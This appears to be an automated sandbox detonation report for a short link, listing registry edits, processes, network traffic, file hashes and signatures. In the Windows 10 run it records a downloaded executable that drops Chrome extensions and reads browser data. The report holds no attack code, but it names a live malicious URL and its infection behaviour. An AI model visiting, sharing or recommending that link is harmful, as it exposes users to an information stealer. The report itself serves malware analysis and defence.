US 1.1.1.1:53 firefox.settings.services.mozilla.com udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 1.1.1.1:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 1.1.1.1:53 content-signature-2.cdn.mozilla.net udp
US 1.1.1.1:53 content-signature-2.cdn.mozilla.net udp
US 1.1.1.1:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-14 17:56

Reported

2024-07-14 17:56

Platform

win7-20240708-en

Max time kernel

9s

Max time network

11s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" https://ify.ac/1Ic5

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "12" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "851" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "9" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "119" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "90" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "851" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "0" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "119" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "851" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "12" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "508" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "62" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "105" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\NumberOfSubdomains = "1" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "105" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "9" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "90" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "105" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "508" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "508" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "12" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "41" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "62" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "0" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "90" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "119" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "9" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "41" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "41" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "62" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{60D143C1-420A-11EF-B254-46D787DB8171} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://ify.ac/1Ic5

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2652 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 ify.ac udp
US 104.21.23.148:443 ify.ac tcp
US 104.21.23.148:443 ify.ac tcp
US 104.21.23.148:443 ify.ac tcp
US 104.21.23.148:443 ify.ac tcp
US 104.21.23.148:443 ify.ac tcp
US 104.21.23.148:443 ify.ac tcp
US 8.8.8.8:53 oasqi.nxt-psh.com udp
US 104.21.20.211:443 oasqi.nxt-psh.com tcp
US 104.21.20.211:443 oasqi.nxt-psh.com tcp
US 8.8.8.8:53 mc.yandex.ru udp
RU 87.250.250.119:443 mc.yandex.ru tcp
RU 87.250.250.119:443 mc.yandex.ru tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 mc.yandex.com udp
RU 87.250.250.119:443 mc.yandex.com tcp
RU 87.250.250.119:443 mc.yandex.com tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\0HRATNDC\ify[1].xml

MD5 c1ddea3ef6bbef3e7060a1a9ad89e4c5
SHA1 35e3224fcbd3e1af306f2b6a2c6bbea9b0867966
SHA256 b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db
SHA512 6be8cec7c862afae5b37aa32dc5bb45912881a3276606da41bf808a4ef92c318b355e616bf45a257b995520d72b7c08752c0be445dceade5cf79f73480910fed

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\0HRATNDC\ify[1].xml

MD5 31e82167a127984e1552e429e8bafb5b
SHA1 8bdec4301f71b61f618c53a27db498c2adea25d9
SHA256 9567ae61d59d086b89ea3ee1334b8355e648801c71511cfb53cc938faf79b664
SHA512 a57554ae763cbe9ea8de215ff67a2b4d42e2b0e581e837152860079dce2d434e1d33471fd646a1d34080cddb9e140a1e813e941fbf4c216cccd4c548bc4b3e12

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\0HRATNDC\ify[1].xml

MD5 a4a32d89bb149cfb8c3a9b57feef1198
SHA1 af60fbdb5af95f35a4a6279e9285588fb606b2d6
SHA256 166c7c6428ebb3352d1869915f30f54aa6f3d3f4d188615c783b868d432daa75
SHA512 054dd9965eb3d6b28f82cf1d71f8d3c9c1227539689af84ee5142061c3aa348542e1341af2a428d227fed28b1025443fbc52989a15d8c4b285ca72f3cca8bae3

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HTBGGANG\favicon[1].ico

MD5 de5a68ecf1315791471000eea42de65d
SHA1 3f3e7239d7ec1702868f51e9d28e528c6c60e984
SHA256 fb94090003c3fd820119448548cb3f11a37304608d1f7401824111f53cfbe61f
SHA512 0b5b8b073714ec8e0cd1992d722c669515ce589d14f4dc224e9c1830c4aa8d3473c441758f8128f381607c85acfd015b1fa0f271c4595c33f4d162eab69f2501

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\c2sxdb0\imagestore.dat

MD5 c329e35d9f19304afee5019f2813befe
SHA1 979afe411709dd69970f45163404f1fb1445729e
SHA256 7219b820b73e666a80869dc37ce9e53b5e26ff14402f065ca0cf2f03e55f5c59
SHA512 a74d2acb9cbb0467f0418003a98e8c1ec1b43f8ba7877c336eae7575dea12f4ea9d12c96140e2cded9f1223c0d0c8edb8edd27df1e7ca5c17a644cdd57789afc

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\0HRATNDC\ify[1].xml

MD5 484795eff0edbb81604127f71210c046
SHA1 21ad4bd1c2dcd51e5654a7ead8f37caec34468de
SHA256 6e5d93d3f9a8ea3736e584aa5f875e1d27b1f254784413099c739c66d0dc0269
SHA512 2639f174549b033776a152460e8c897d3399ac290ffae4f65aa13a0de1612f37a5aa58a0ef8cf9fe1b3fd05e0b93e8f825d8b69c87fdd00ddd2b6d7936cba022

C:\Users\Admin\AppData\Local\Temp\Tar63F5.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Temp\Cab63F3.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 549c42d5e5f58aaed4f5eba580245b46
SHA1 f05d49ec683142c5b61a2e1cef6767fd3fe055db
SHA256 abb37fdc7fe6f391f11f8b33ead032e6ee78352057002a1fdcfef954a1703ae7
SHA512 0e7b2cab3838696e0771a1030a5734f88ba66e248b5d94d835ad3dc7422d34be8926838111df8840181df61013f72ece625c76675a525414b93d937b5656ab1b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0617f09453a5d2da658b1127d97a37e5
SHA1 22eb95fc45ac0400c0a6edefb53290650603abf2
SHA256 eb6864356878efc1a27ac55bf91c3a0c9e3a40264d0ebf89846a556863ddbeff
SHA512 2ad18cad72d49642c89a644c968546a89a1ff233bc6d461b0b9751ab8464f893b0433b057b2e934fcd7ac22334e9f3142fc5fa56a69d9e58254b1bd3a07ef822

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e9e6e727e596602e8913ee96e379e97d
SHA1 5772c56b4edd6cce3b4794a867f6e414090c2812
SHA256 0b35646636421effb1f2184d68b9478193381e0624d7999fa5c2b058a93a2a11
SHA512 e2375b2f2d336ab5ac2c954cce42d52cac33e25f2e409b2d4f98c815e2dcd5e785ee809fb364234683816680f7a8cdd0b644069d7614acb84e2ead5b90166e35

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5b456c8f7279e5a92dfe9c1408c4171b
SHA1 ff8fa62aedf96461ddf8e86d2c0c5c7a432ad5a1
SHA256 3422d846130395a10e0a805163fcadf8b9c66663914644045ace6b9afc7f30ff
SHA512 d09d80a1081ce35f6674fbe19603bb4008e31af4bef34708215a76b9184ee774e0c64166c2aaa574c4417f2bc0459cc69e2ebcc86830bbdf162c8a62621e6db8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 82acdbabda0a275341fb81c3167c8535
SHA1 6c76808b09e3eb4da105c5b4f77679c38c4e8f84
SHA256 1d3cce82152a5176f06503e7899f511ebbd50224c43f2d6103f18199c2837dd4
SHA512 d3321328ffd0bf208cbe8e39fe1076430af03467f6c914d30b12400fbccbcc1ec530d84c8870eb22da75f9700f24ce9a65808a95c6448c7dc640c5c70289ccdf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5dd397f70ad7147840e69d7bbf517886
SHA1 f9a8c94fa32146601539d25f8986246702a9021e
SHA256 025e34d76f7d19f1a97b1215a9f5d31b16f484aafbf479734b8fd488ec5533e7
SHA512 c3e07a04a2a430e9abff696464beefc46de814bef14a50a8a804f9afe19aabab26858e0bda02482598f768ffd1820b5780ea42c8b1ea917cd416421a0bf62bbb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4e24cb5051d2b5c5791c3fabeee27ca0
SHA1 ba78dbaaa3796d3ef9b739a5a42bd51ca57e5e7b
SHA256 64d9a30ef3baccc8af6ac1e77f51cbe5be57223be67e071eb7b37e93c97d0e4f
SHA512 a62c891770aae50f214b7b2fdb74bdc33c84afe1f6261c825d6ad69499f3fddea138978099dd5722f84ed042c1ec965ae9d083a6f68a6886c7f1cc859cdc0a62

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 414b35a193817ce2d007918804030d0b
SHA1 e274d0c2e326f9a3f057d5c4422448db3223a14c
SHA256 74305e7ede1cf000206a04bb780d90548516aac4cb6ded5152553717ceb111a7
SHA512 7362c99bfd3232d2376e576089d80fdfb8004fe7c449ac7bb8fe2da214c0204ecfd54a74008a61eb9b4054e2ab072f42dace86452fd43ed1b52f8673e7a5b5ce

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 00a6060bb2acd11a5da42acf6c7000ab
SHA1 d6a0d92f7fe4b0f74ff657b23b27f10d940d53d7
SHA256 1b9b0d0e5fa1c55988cd6f9a0f80ee25b543c271ec45b3e98c46a66a5cfaa5b5
SHA512 6f3d30b5da12f2ca693885a59f7593b5ea769185e65d48d4253d71da3e9b4ff8271877932221d80263ef449d2d48ccb0b2d95b38e5c6c1358821e07ad622c177

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b35e62cfdbdaa6c81ea1588e39b244d4
SHA1 ac931f65cbae0c30533c5f5acb18fae18f208bdd
SHA256 2792692a7b9bc6cd91eff7edaba39a2d471b3fa8791eeebdd05d7c5dbb58e1a2
SHA512 81418b0b70780dd43cb0b0aaae9fab2ec7a60f7b4e2e298ccfafa010255ad7c95179ec3380269c66c4778a29ac2eba53065818677e8882937ef5ffe18ff39f87

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-14 17:56

Reported

2024-07-14 18:01

Platform

win10v2004-20240709-en

Max time kernel

294s

Max time network

282s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1Ic5

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
